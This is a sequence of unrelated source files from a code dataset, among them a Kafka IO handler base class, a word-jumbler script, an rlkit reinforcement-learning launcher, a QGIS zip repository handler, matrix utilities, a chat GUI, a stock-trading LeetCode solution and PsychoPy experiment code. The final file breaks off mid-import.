should raise an :class:`esque.io.exceptions.EsqueIOSerializerConfigNotSupported`\n if this operation is not supported for a particular\n handler.\n\n :return: Tuple of dictionaries containing the configs for the key and value serializer\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def put_serializer_configs(self, config: Tuple[Dict[str, Any], Dict[str, Any]]) -> None:\n \"\"\"\n Persists the serializer config in this handler's source, if possible.\n Implementations should raise an :class:`esque.io.exceptions.EsqueIOSerializerConfigNotSupported`\n if this operation is not supported for a particular\n handler.\n\n :param config: Tuple of dictionaries containing the configs for the key and value serializer\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def write_message(self, binary_message: Union[BinaryMessage, StreamEvent]) -> None:\n \"\"\"\n Write the message from `binary_message` to this handler's source.\n The handler may choose which action to take upon receiving any :class:`StreamEvent`\n instances but mostly the appropriate action is to just ignore them.\n\n :param binary_message: The message that is supposed to be written.\n \"\"\"\n raise NotImplementedError\n\n def write_many_messages(self, message_stream: Iterable[Union[BinaryMessage, StreamEvent]]) -> None:\n \"\"\"\n Write all messages from the iterable `message_stream` to this handler's source.\n The handler may choose which action to take upon receiving any :class:`StreamEvent`\n instances but mostly the appropriate action is to just ignore them.\n\n :param message_stream: The messages that are supposed to be written.\n \"\"\"\n for binary_message in message_stream:\n self.write_message(binary_message)\n\n @abstractmethod\n def read_message(self) -> Union[BinaryMessage, StreamEvent]:\n \"\"\"\n Read the next :class:`BinaryMessage` from this handler's source.\n Returns an object of :class:`StreamEvent` to indicate certain events that may happen while reading from the\n source.\n For example if the handler has reached a permanent end, like the end of a file or a closed stream, then\n it will return a :class:`PermanentEndOfStream` object.\n If the handler has reached a temporary end (e.g. the end of a topic was reached but new messages might come in\n at some point) then it will return an object of :class:`TemporaryEndOfStream`.\n Both of these classes are subclasses of :class:`EndOfStream`.\n\n :return: The next message from this handler's source, or a stream event.\n :raises EsqueIOHandlerReadException: When there was a failure accessing the source. Like a broken pipe.\n \"\"\"\n raise NotImplementedError\n\n def binary_message_stream(self) -> Iterable[Union[BinaryMessage, StreamEvent]]:\n \"\"\"\n Read :class:`BinaryMessage`s from this handler's source until the source's permanent end is reached.\n Yields an object of :class:`StreamEvent` to indicate certain events that may happen while reading from the\n source.\n For example if the handler has reached a permanent end, like the end of a file or a closed stream, then\n it will return a :class:`PermanentEndOfStream` object.\n If the handler has reached a temporary end (e.g. the end of a topic was reached but new messages might come in\n at some point) then it will return an object of :class:`TemporaryEndOfStream`.\n Both of these classes are subclasses of :class:`EndOfStream`.\n\n The last object returned before the iterable ends is always an instance of :class:`PermanentEndOfStream`.\n\n :raises EsqueIOHandlerReadException: When there was a failure accessing the source. Like a broken pipe.\n :returns: Iterable yielding all messages from this handler's source until a permanent end was reached.\n \"\"\"\n while True:\n msg = self.read_message()\n yield msg\n if isinstance(msg, PermanentEndOfStream):\n break\n\n @abstractmethod\n def close(self) -> None:\n \"\"\"\n Close all resources that have been opened by this handler.\n \"\"\"\n raise NotImplementedError\n","sub_path":"esque/io/handlers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2530382","text":"import sys\nimport urllib2\nfrom StringIO import StringIO\nfrom zipfile import ZipFile\n\nperms = []\nsubs = set()\n\ndef swap(string,a,b):\n\t\"\"\"\tHelper function for perm \"\"\" \n\ttemp = list(string)\n\ttemp[a],temp[b] = temp[b],temp[a]\n\treturn \"\".join(temp)\n\ndef perm(string,i=0):\n\t\"\"\" Finds all possible permutations from input string\n\t\tcomplexity ~ O(N!)\n\t\"\"\"\n\tif i == len(string)-1:\n\t\tperms.append(string)\n\telse:\n\t\tfor j in range(i,len(string)):\n\t\t\tstring = swap(string,i,j)\n\t\t\tperm(string,i+1)\n\t\t\tstring = swap(string,i,j)\n\ndef substr(string):\n\t\"\"\" Finds all possible substrings from input string\n\t\tand throws them in a set to eliminate duplicates.\n\t\tcomplexity ~ O(2^N)\n\t\"\"\"\n\tglobal subs\n\ti = 1\n\twhile True:\n\t\tfor j in range(len(string)-i+1):\n\t\t\tsubs.add(string[j:j+i])\n\t\tif i == len(string):\n\t\t\tbreak\n\t\ti += 1\n\nif __name__ == '__main__':\n\tif len(sys.argv) != 2:\n\t\tprint(\">> Usage: jumbler.py \")\n\t\tsys.exit(0)\n\tstring = str(sys.argv[1])\n\tif not string.isalpha():\n\t\tprint(\">> Error: '%s' is not a string\" % string)\n\t\tsys.exit(0)\n\tprint(\">> Dissecting '%s'\" % string)\n\n\t#find all permutations then all their substrings\n\tperm(string)\n\tfor x in perms:\n\t\tsubstr(x)\n\n\t#load the dictionary into memory\n\tprint(\">> Loading Kevin's Automatically Generated Inflection Database (wordlist.sourceforge.net) into memory...\")\n\tbaseURL = \"http://downloads.sourceforge.net/wordlist/\"\n\tfilename = \"agid-4.zip\"\n\n\tresponse = urllib2.urlopen(baseURL + filename)\n\tmyFile = ZipFile(StringIO(response.read()))\n\n\tword_list = []\n\tfor line in myFile.open(\"infl.txt\").readlines():\n\t\tword_list.append(line[:line.find(' ')])\n\n\t#intersect wordlist and set of all substrings\n\tresults = list(subs & set(word_list))\n\tprint(\">> Woah! We found %s words:\" % str(len(results)))\n\tprint(results)\n","sub_path":"jumbler.py","file_name":"jumbler.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"369220259","text":"import pickle\n\nimport rlkit.torch.pytorch_util as ptu\nfrom multiworld.core.flat_goal_env import FlatGoalEnv\nfrom rlkit.data_management.obs_dict_replay_buffer import \\\n ObsDictRelabelingBuffer\nfrom rlkit.data_management.her_replay_buffer import RelabelingReplayBuffer\nfrom rlkit.envs.multitask.multitask_env import \\\n MultitaskEnvToSilentMultitaskEnv, MultiTaskHistoryEnv\nfrom rlkit.envs.wrappers import NormalizedBoxEnv\nfrom rlkit.exploration_strategies.base import (\n PolicyWrappedWithExplorationStrategy\n)\nfrom rlkit.exploration_strategies.epsilon_greedy import EpsilonGreedy\nfrom rlkit.exploration_strategies.gaussian_strategy import GaussianStrategy\nfrom rlkit.exploration_strategies.ou_strategy import OUStrategy\nfrom rlkit.torch.networks import ConcatMlp, TanhMlpPolicy\nfrom rlkit.torch.sac.policies import TanhGaussianPolicy\nfrom rlkit.state_distance.tdm_networks import TdmQf, TdmPolicy\n# from rlkit.torch.her.her_twin_sac import HerTwinSac\n# from rlkit.torch.her.her_sac import HerSac\n\nfrom rlkit.state_distance.tdm_td3 import TdmTd3\nfrom rlkit.misc.ml_util import IntPiecewiseLinearSchedule\n\n\ndef tdm_td3_experiment(variant):\n variant['env_kwargs'].update(variant['reward_params'])\n env = variant['env_class'](**variant['env_kwargs'])\n\n multiworld_env = variant.get('multiworld_env', True)\n\n if multiworld_env is not True:\n env = MultitaskEnvToSilentMultitaskEnv(env)\n if variant[\"render\"]:\n env.pause_on_goal = True\n\n if variant['normalize']:\n env = NormalizedBoxEnv(env)\n\n exploration_type = variant['exploration_type']\n if exploration_type == 'ou':\n es = OUStrategy(\n action_space=env.action_space,\n max_sigma=0.1,\n **variant['es_kwargs']\n )\n elif exploration_type == 'gaussian':\n es = GaussianStrategy(\n action_space=env.action_space,\n max_sigma=0.1,\n min_sigma=0.1, # Constant sigma\n **variant['es_kwargs'],\n )\n elif exploration_type == 'epsilon':\n es = EpsilonGreedy(\n action_space=env.action_space,\n prob_random_action=0.1,\n **variant['es_kwargs'],\n )\n else:\n raise Exception(\"Invalid type: \" + exploration_type)\n if multiworld_env is True:\n obs_dim = env.observation_space.spaces['observation'].low.size\n action_dim = env.action_space.low.size\n goal_dim = env.observation_space.spaces['desired_goal'].low.size\n else:\n obs_dim = action_dim = goal_dim = None\n vectorized = 'vectorized' in env.reward_type\n variant['algo_kwargs']['tdm_kwargs']['vectorized'] = vectorized\n\n norm_order = env.norm_order\n variant['algo_kwargs']['tdm_kwargs']['norm_order'] = norm_order\n\n qf1 = TdmQf(\n env=env,\n observation_dim=obs_dim,\n action_dim=action_dim,\n goal_dim=goal_dim,\n vectorized=vectorized,\n norm_order=norm_order,\n **variant['qf_kwargs']\n )\n qf2 = TdmQf(\n env=env,\n observation_dim=obs_dim,\n action_dim=action_dim,\n goal_dim=goal_dim,\n vectorized=vectorized,\n norm_order=norm_order,\n **variant['qf_kwargs']\n )\n policy = TdmPolicy(\n env=env,\n observation_dim=obs_dim,\n action_dim=action_dim,\n goal_dim=goal_dim,\n **variant['policy_kwargs']\n )\n exploration_policy = PolicyWrappedWithExplorationStrategy(\n exploration_strategy=es,\n policy=policy,\n )\n\n relabeling_env = pickle.loads(pickle.dumps(env))\n\n algo_kwargs = variant['algo_kwargs']\n\n if multiworld_env is True:\n observation_key = variant.get('observation_key', 'state_observation')\n desired_goal_key = variant.get('desired_goal_key', 'state_desired_goal')\n achieved_goal_key = variant.get('achieved_goal_key', 'state_achieved_goal')\n replay_buffer = ObsDictRelabelingBuffer(\n env=relabeling_env,\n observation_key=observation_key,\n desired_goal_key=desired_goal_key,\n achieved_goal_key=achieved_goal_key,\n vectorized=vectorized,\n **variant['replay_buffer_kwargs']\n )\n algo_kwargs['tdm_kwargs']['observation_key'] = observation_key\n algo_kwargs['tdm_kwargs']['desired_goal_key'] = desired_goal_key\n else:\n replay_buffer = RelabelingReplayBuffer(\n env=relabeling_env,\n **variant['replay_buffer_kwargs']\n )\n\n # qf_criterion = variant['qf_criterion_class']()\n # algo_kwargs['td3_kwargs']['qf_criterion'] = qf_criterion\n algo_kwargs['td3_kwargs']['training_env'] = env\n if 'tau_schedule_kwargs' in variant:\n tau_schedule = IntPiecewiseLinearSchedule(**variant['tau_schedule_kwargs'])\n else:\n tau_schedule = None\n algo_kwargs['tdm_kwargs']['epoch_max_tau_schedule'] = tau_schedule\n\n algorithm = TdmTd3(\n env,\n qf1=qf1,\n qf2=qf2,\n policy=policy,\n exploration_policy=exploration_policy,\n replay_buffer=replay_buffer,\n **variant['algo_kwargs']\n )\n if ptu.gpu_enabled():\n qf1.to(ptu.device)\n qf2.to(ptu.device)\n policy.to(ptu.device)\n algorithm.to(ptu.device)\n algorithm.train()","sub_path":"rlkit/launchers/experiments/soroush/multiworld_tdm.py","file_name":"multiworld_tdm.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"456225158","text":"# coding=utf-8\nimport logging\nimport urlparse\nfrom zipfile import ZipFile\n\nfrom PyQt4.QtCore import QTemporaryFile\n\nfrom resource_sharing.repository_handler.base import BaseRepositoryHandler\nfrom resource_sharing.utilities import local_collection_path\nfrom resource_sharing.network_manager import NetworkManager\n\n\nLOGGER = logging.getLogger('QGIS Resources Sharing')\n\n\nclass RemoteZipHandler(BaseRepositoryHandler):\n \"\"\"Class to handle remote zip repository.\"\"\"\n IS_DISABLED = False\n\n def __init__(self, url):\n \"\"\"Constructor.\"\"\"\n BaseRepositoryHandler.__init__(self, url)\n\n def can_handle(self):\n if not self.is_git_repository:\n if self._parsed_url.scheme in ['http', 'https']:\n return True\n return False\n\n def fetch_metadata(self):\n \"\"\"Fetch metadata file from the url.\"\"\"\n # Download the metadata\n network_manager = NetworkManager(self.metadata_url, self.auth_cfg)\n status, description = network_manager.fetch()\n if status:\n self.metadata = network_manager.content\n return status, description\n\n def download_collection(self, id, register_name):\n \"\"\"Download a collection given its ID.\n\n For zip collection, we will download the zip, and extract the\n collection to collections dir.\n\n :param id: The ID of the collection.\n :type id: str\n\n :param register_name: The register name of the collection (the\n section name of the collection)\n :type register_name: unicode\n \"\"\"\n # Download the zip first\n collection_path = 'collections/%s.zip' % register_name\n network_manager = NetworkManager(self.file_url(collection_path))\n status, description = network_manager.fetch()\n\n if not status:\n return False, description\n\n # Create the zip file\n zip_file = QTemporaryFile()\n if zip_file.open():\n zip_file.write(network_manager.content)\n zip_file.close()\n\n zf = ZipFile(zip_file.fileName())\n zf.extractall(path=local_collection_path(id))\n return True, None\n\n def file_url(self, relative_path):\n return urlparse.urljoin(self.url, relative_path)\n","sub_path":"resource_sharing/repository_handler/remote_zip_handler.py","file_name":"remote_zip_handler.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"275436660","text":"import numpy as np\n\n\ndef add(A, B):\n # сумма двух матриц\n assert len(A) == len(B)\n assert len(A[0]) == len(B[0])\n\n n = len(A)\n m = len(A[0])\n\n C = zeroes(n, m)\n\n for i in range(n):\n for j in range(m):\n C[i][j] = A[i][j] + B[i][j]\n return C\n\n\ndef subtract(A, B):\n # разность двух матриц\n assert len(A) == len(B)\n assert len(A[0]) == len(B[0])\n\n n = len(A)\n m = len(A[0])\n\n C = zeroes(n, m)\n\n for i in range(n):\n for j in range(m):\n C[i][j] = A[i][j] - B[i][j]\n return C\n\n\ndef zeroes(n):\n # список длинной n, заполенный нулями\n return [0.] * n\n\n\ndef zeroes(n, m):\n # нулевая матрица n*m\n return [([0.] * m).copy() for i in range(n)]\n\n\ndef ident_matrix(n):\n # возвращает квадратную единичную матрицу\n A = zeroes(n, n)\n for i in range(n):\n A[i][i] = 1\n return A\n\n\ndef mul(A, B):\n # произведение двух матриц\n assert len(A[0]) == len(B)\n l = len(A)\n m = len(A[0])\n n = len(B[0])\n C = zeroes(l, n)\n for i in range(l):\n for j in range(n):\n summ = 0\n for r in range(m):\n summ += A[i][r] * B[r][j]\n C[i][j] = summ\n return C\n\n\ndef transpose(A):\n # транспонирование матрицы\n height = len(A)\n width = len(A[0])\n return [[A[row][col] for row in range(0, height)] for col in range(0, width)]\n\n\ndef norm(A):\n # с-норма матрицы\n # сумма элементов максимальной строки\n n = len(A)\n m = len(A[0])\n ret = 0\n for i in range(n):\n summ = 0\n for j in range(m):\n summ += abs(A[i][j])\n ret = max(ret, summ)\n return ret\n\n\ndef norm1(A):\n # норма матрицы\n # сумма элементов максимального столбца\n n = len(A)\n m = len(A[0])\n ret = 0\n for i in range(m):\n summ = 0\n for j in range(n):\n summ += abs(A[j][i])\n ret = max(ret, summ)\n return ret\n\n\ndef norm2(A):\n # евклидова норма матрицы\n # (2 - норма\n n = len(A)\n m = len(A[0])\n summ = 0\n for i in range(n):\n for j in range(m):\n summ += A[i][j] ** 2\n return summ ** 0.5\n\n\ndef vector_norm(v):\n # возвращает евклидову норму вектора\n summ = 0\n for elem in v:\n summ += elem ** 2\n return summ ** 0.5\n\n\ndef format(A):\n # форматированный \"красивый\" вывод матрицы\n return np.array(A)\n\n\ndef copy(A):\n # возвращает копию матрицы\n return [x.copy() for x in A]\n","sub_path":"matrix_transformations.py","file_name":"matrix_transformations.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"331146543","text":"# Valentina Neblitt-Jones\n# CS 595 Introduction to Web Science\n# Fall 2013\n# Assignment #7 Question #1\n\nimport json\nimport pprint\n\ng = open('zachary1.json', 'w')\npp = pprint.PrettyPrinter()\n\nadict = {}\nadict[\"nodes\"] = []\nadict[\"links\"] = []\n\nid = 0 # name\n\nwith open('zachary.dat', 'r') as f:\n good = f.readlines()[41:]\nfor line in good:\n\tperson = line.split()\n\tid = id + 1 # generates name\n\tadict[\"nodes\"].append({'id':str(id)})\n\tfor i in range(0, len(person)):\n\t\tweight = int(person[i])\n\t\tsource = id - 1\n\t\ttarget = i\n\t\tif weight != 0:\n\t\t\tadict[\"links\"].append({'source': source, 'target': target, 'weight':weight})\n\t\t\t\npp.pprint(adict)\noutput = json.dumps(adict, indent=4)\ng.write(output)\n\nf.close()\ng.close()\n \n","sub_path":"assignment07/q1/CreateJSONFile01.py","file_name":"CreateJSONFile01.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"218511313","text":"# -*- coding: utf-8 -*-\r\nimport threading\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\n\r\nfrom engine import Engine\r\nimport settings\r\n\r\nclass Controller(threading.Thread):\r\n def __init__(self):\r\n threading.Thread.__init__(self)\r\n #是否更新\r\n #False表示下载url_queue的链接,True表示更新,\r\n self.run_list=[False,True]\r\n self.run_sqe=0\r\n self.engine_is_running=False\r\n \r\n def run(self):\r\n '''循环运行'''\r\n self.is_running=True\r\n #设置运行类型\r\n self.is_update=self.run_list[self.run_sqe]\r\n settings.S_is_update=self.is_update\r\n\r\n self.eng=Engine(settings.S_target_website)\r\n self.eng.start()\r\n \r\n self.run_sqe+=1\r\n if self.run_sqe>=len(self.run_list):\r\n self.run_sqe=0\r\n \r\n self.engine_is_running=True\r\n self.eng.join()\r\n if self.is_running:\r\n self.run()\r\n \r\n def stop(self):\r\n self.eng.is_running=False\r\n self.is_running=False\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"mycode/python/pachong/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"79633201","text":"import os, struct\r\nfrom Crypto.Cipher import AES\r\n\r\ndef encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):\r\n if not out_filename:\r\n out_filename = 'uploads/'+in_filename + '.enc'\r\n\r\n iv = '1234561234561234'\r\n encryptor = AES.new(key.encode('utf-8'), AES.MODE_CBC, iv.encode('utf-8'))\r\n filesize = os.path.getsize(in_filename)\r\n \r\n with open(in_filename, 'rb') as infile:\r\n with open('uploads/'+out_filename, 'wb') as outfile:\r\n outfile.write(struct.pack('\", self.new_chat_with)\n self.center_window()\n\n def center_window(self):\n\n w = 290\n h = 150\n\n sw = self.parent.winfo_screenwidth()\n sh = self.parent.winfo_screenheight()\n\n x = (sw - w) / 2\n y = (sh - h) / 2\n self.parent.geometry('%dx%d+%d+%d' % (w, h, x, y))\n\n def self_update(self):\n if not self.client.active:\n self.active = False\n self.listbox.delete(0, END)\n self.listbox.insert(END, 'No connection to master server')\n self.listbox.bind(\"\", '')\n self.listbox.config(state='disabled')\n for window in self.opened_chat_windows:\n window.button.config(state='disabled')\n\n time.sleep(0.2)\n if not self.old_list == self.client.client_list:\n self.listbox.delete(0, END)\n for client in self.client.client_list:\n self.listbox.insert(END, client[0])\n self.old_list = self.client.client_list[:]\n\n try:\n message = self.client.messages.get_nowait()\n for client in self.client.client_list:\n if client[1] == message['address']:\n chat_window = self.recieve_new_chat(client)\n time.sleep(0.1)\n chat_window.print_message(str(message['text'], 'utf8'))\n\n except queue.Empty:\n pass\n\n self.parent.after(100, self.self_update)\n\n def new_chat_with(self, e):\n if not self.listbox.curselection():\n return\n user = self.client.client_list[int(self.listbox.curselection()[0])]\n for opened_chat in self.opened_chat_windows:\n if opened_chat.user == user:\n if opened_chat.hidden:\n opened_chat.parent.deiconify()\n return opened_chat\n\n new_window = Toplevel()\n new_chat = ChatWindow(new_window, self, user=user)\n self.opened_chat_windows.append(new_chat)\n return new_chat\n\n def recieve_new_chat(self, user):\n for opened_chat in self.opened_chat_windows:\n if opened_chat.user == user:\n return opened_chat\n\n new_window = Toplevel()\n new_chat = ChatWindow(new_window, self, user=user)\n self.opened_chat_windows.append(new_chat)\n return new_chat\n\n def shutdown(self):\n self.active = False\n self.client.active = False\n self.parent.destroy()\n","sub_path":"GUI/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"445616429","text":"\"\"\"\n122. Best Time to Buy and Sell Stock II\nEasy\n\nSay you have an array for which the ith element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times).\n\nNote: You may not engage in multiple transactions at the same time (i.e., you must sell the stock before you buy again).\n\nExample 1:\n\nInput: [7,1,5,3,6,4]\nOutput: 7\nExplanation: Buy on day 2 (price = 1) and sell on day 3 (price = 5), profit = 5-1 = 4.\n Then buy on day 4 (price = 3) and sell on day 5 (price = 6), profit = 6-3 = 3.\n\nExample 2:\n\nInput: [1,2,3,4,5]\nOutput: 4\nExplanation: Buy on day 1 (price = 1) and sell on day 5 (price = 5), profit = 5-1 = 4.\n Note that you cannot buy on day 1, buy on day 2 and sell them later, as you are\n engaging multiple transactions at the same time. You must sell before buying again.\n\nExample 3:\n\nInput: [7,6,4,3,1]\nOutput: 0\nExplanation: In this case, no transaction is done, i.e. max profit = 0.\n\"\"\"\n\nfrom typing import List\n\n###############################################################################\n\"\"\"\nSolution 1: Add up all price increases.\n\nO(n) time\nO(1) extra space\n\"\"\"\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n n = len(prices)\n profit = 0\n\n for i in range(1, n):\n if prices[i] > prices[i-1]:\n profit += prices[i] - prices[i-1]\n\n #profit += max(0, prices[i] - prices[i-1])\n\n return profit\n\nclass Solution1b:\n def maxProfit(self, prices: List[int]) -> int:\n return sum(max(prices[i+1] - prices[i], 0) for i in range(len(prices) - 1))\n\nclass Solution1c:\n def maxProfit(self, prices: List[int]) -> int:\n return sum([b - a for a, b in zip(prices, prices[1:]) if b - a > 0])\n\n###############################################################################\n\"\"\"\nSolution 2: greedy approach. Buy at valleys, just before first increase.\nSell at peaks, just before first decrease or at end.\n\nO(n) time\nO(1) extra space\n\"\"\"\nclass Solution2:\n def maxProfit(self, prices: List[int]) -> int:\n end = len(prices) - 1\n profit = 0\n i = 0\n\n while i < end:\n # Buy just before first increase (virtual buy at end).\n while i < end and prices[i] >= prices[i+1]:\n i += 1\n\n buy_price = prices[i]\n\n # Sell just before first decrease or at end.\n while i < end and prices[i] <= prices[i+1]:\n i += 1\n \n profit += prices[i] - buy_price\n\n return profit\n\n###############################################################################\n\"\"\"\nSolution 3: greedy approach. Buy at every valley (other than end) and sell at\nfirst peak after each buy. Check if previous transaction was a buy.\n\nIf a valley is part of a plateau (eg, 6, 2, 2, 4), buy at the right-most\npoint of the plateau. If a peak is part of a plateau (eg, 2, 4, 4, 1), sell\nat the right-most point of the plateau.\n\nO(n) time\nO(1) extra space\n\"\"\"\nclass Solution3:\n def maxProfit(self, prices: List[int]) -> int:\n n = len(prices)\n if n < 2:\n return 0\n\n profit = 0\n buy_price = None\n \n for i, p in enumerate(prices):\n # Buy 1st price if 2nd price is greater.\n if i == 0 and p < prices[i+1]:\n print(f\"Buy for {p}\")\n buy_price = p\n\n # Buy at end of valley if previous transaction was not a buy.\n if 0 < i < n-1 and p <= prices[i-1] and p < prices[i+1]:\n if buy_price == None:\n print(f\"Buy for {p}\")\n buy_price = p\n\n # Sell at end of peak if previous transaction was a buy.\n if (i > 0 and p >= prices[i-1]) and (i == n-1 or p > prices[i+1]):\n if buy_price != None: # could be 0\n profit += p - buy_price\n buy_price = None\n print(f\"Sell for {p}\")\n\n return profit\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(arr, comment=None):\n print(\"=\"*80)\n if comment:\n print(comment)\n\n print(f\"\\ns = {arr}\")\n \n res = sol.maxProfit(arr)\n\n print(f\"\\nres = {res}\\n\")\n \n\n sol = Solution() # add up price increases (every interval)\n #sol = Solution2() # buy at valleys, sell at peaks\n #sol = Solution3() # buy at valleys, sell at peaks\n\n comment = \"LC ex1; answer = 7\"\n arr = [7,1,5,3,6,4]\n test(arr, comment)\n\n comment = \"LC ex2; answer = 4\"\n arr = [1,2,3,4,5]\n test(arr, comment)\n\n comment = \"LC ex2; answer = 0\"\n arr = [7,6,4,3,1]\n test(arr, comment)\n\n comment = \"LC test case; answer = 7\"\n arr = [6,1,3,2,4,7]\n test(arr, comment)\n\n comment = \"LC test case; answer = 0\"\n arr = [1]\n test(arr, comment)\n\n comment = \"LC test case; answer = 3\"\n arr = [2,2,5]\n test(arr, comment)\n\n comment = \"LC test case; answer = 20\"\n arr = [5,2,3,2,6,6,2,9,1,0,7,4,5,0]\n test(arr, comment)\n\n comment = \"LC test case; answer = 0\"\n arr = [3,3]\n test(arr, comment)\n\n comment = \"LC test case; answer = 8\"\n arr = [0,5,5,6,2,1,1,3]\n test(arr, comment)\n\n comment = \"LC test case; answer = 0\"\n arr = []\n test(arr, comment)\n ","sub_path":"greedy/0122_best_time_to_buy_and_sell_stock_ii.py","file_name":"0122_best_time_to_buy_and_sell_stock_ii.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"81766244","text":"from __future__ import absolute_import, division\r\nfrom psychopy import locale_setup, sound, gui, visual, core, data, event, logging, clock\r\nfrom psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,\r\n STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)\r\nimport numpy as np # whole numpy lib is available, prepend 'np.'\r\nfrom numpy import (sin, cos, tan, log, log10, pi, average,\r\n sqrt, std, deg2rad, rad2deg, linspace, asarray)\r\nfrom numpy.random import random, randint, normal, shuffle\r\nimport os # handy system and path functions\r\nimport sys # to get file system encoding\r\n\r\n# from psychopy.hardware import keyboard\r\n\r\n#\r\n# a = [np.array([[1], [2]]), np.array([[4], [5]])]\r\n# b = np.array([i for i in a[0]])\r\n# c = ['w', 'w']\r\n# d = pd.DataFrame(list(zip(b, c)), columns=['b', 'c'])\r\n# d.to_csv('scratch.csv', encoding='utf-8', index=False)\r\n# # a = [np.array([[1], [2]]), np.array([[4], [5]])]\r\n# a = data.importConditions(\"tAll_trials.csv\")\r\n# print(a)\r\n\r\n# import pandas as pd\r\n\r\n\r\n# tExp = pd.read_csv(\"tAll_trials.csv\")\r\n\r\n# count = 0\r\n# for iVar in list(tExp):\r\n# count = count + 1\r\n# if count == 3:\r\n# print(type(iVar))\r\n# iVal = tExp[iVar][0]\r\n# print(type(iVal))\r\n\r\n# # # numpy.float64\r\n# # if type(iVal) == float:\r\n# # exec(\"%s = %f\" % (iVar, iVal))\r\n# # elif type(iVal) == str:\r\n# # exec(\"%s = '%s'\" % (iVar, iVal))\r\n# if type(iVal) == str:\r\n# print(\"%s = '%s'\" % (iVar, iVal))\r\n\r\n# exec(\"%s = '%s'\" % (iVar, iVal))\r\n# else:\r\n# print(\"%s = %f\" % (iVar, iVal))\r\n# exec(\"%s = %f\" % (iVar, iVal))\r\n\r\n\r\n\r\n# Store info about the experiment session\r\npsychopyVersion = '3.1.2'\r\nexpName = 'popout_cindy' # from the Builder filename that created this script\r\nexpInfo = {'participant': '', 'session': '001'}\r\ndlg = gui.DlgFromDict(dictionary=expInfo, sortKeys=False, title=expName)\r\nif dlg.OK == False:\r\n core.quit() # user pressed cancel\r\nexpInfo['date'] = data.getDateStr() # add a simple timestamp\r\nexpInfo['expName'] = expName\r\nexpInfo['psychopyVersion'] = psychopyVersion\r\n\r\n# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc\r\nfilename = _thisDir + os.sep + u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])\r\n\r\n# An ExperimentHandler isn't essential but helps with data saving\r\nthisExp = data.ExperimentHandler(name=expName, version='',\r\n extraInfo=expInfo, runtimeInfo=None,\r\n originPath='D:\\\\GitHub\\\\Behavior-popout-attention\\\\popout_exp0\\\\popout_cindy_lastrun.py',\r\n savePickle=True, saveWideText=True,\r\n dataFileName=filename)\r\n# save a log file for detail verbose info\r\nlogFile = logging.LogFile(filename+'.log', level=logging.EXP)\r\nlogging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file\r\n\r\nendExpNow = False # flag for 'escape' or other condition => quit the exp\r\n\r\n# Start Code - component code to be run before the window creation\r\n\r\n# Setup the Window\r\nwin = visual.Window(\r\n size=[2048, 1152], fullscr=True, screen=0,\r\n winType='pyglet', allowGUI=False, allowStencil=False,\r\n monitor='testMonitor', color=[0,0,0], colorSpace='rgb',\r\n blendMode='avg', useFBO=True)\r\n# store frame rate of monitor if we can measure it\r\nexpInfo['frameRate'] = win.getActualFrameRate()\r\nif expInfo['frameRate'] != None:\r\n frameDur = 1.0 / round(expInfo['frameRate'])\r\nelse:\r\n frameDur = 1.0 / 60.0 # could not measure, so guess\r\n\r\n# create a default keyboard (e.g. to check for escape)\r\n# defaultKeyboard = keyboard.Keyboard()\r\n\r\n# Initialize components for Routine \"instr\"\r\ninstrClock = core.Clock()\r\ntBlank_text = ''\r\nCindy_num_blocks_finished = 0\r\n\r\nMyExps = data.TrialHandler(nReps=1, method='random',\r\n extraInfo=expInfo, originPath=-1,\r\n trialList=data.importConditions('tExp.csv'),\r\n seed=None, name='MyExps')\r\nthisExp.addLoop(MyExps) # add the loop to the experiment\r\nthisMyExp = MyExps.trialList[0] # so we can initialise stimuli with some values\r\n# abbreviate parameter names if possible (e.g. rgb = thisMyExp.rgb)\r\nif thisMyExp != None:\r\n print(thisMyExp)\r\n for paramName in thisMyExp:\r\n print(paramName)\r\n print(format(paramName))\r\n exec('{} = thisMyExp[paramName]'.format(paramName))","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"124618331","text":"\"\"\"\ndeep_ecg_v4.py\n--------------\nThis module provides a class and methods for building a convolutional neural network with tensorflow.\nBy: Sebastian D. Goodfellow, Ph.D., 2018\n\"\"\"\n\n# Compatibility imports\nfrom __future__ import absolute_import, division, print_function\n\n# 3rd party imports\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import f1_score\n\n# Local imports\nfrom deepecg.training.train.disc.data_generator import DataGenerator\nfrom 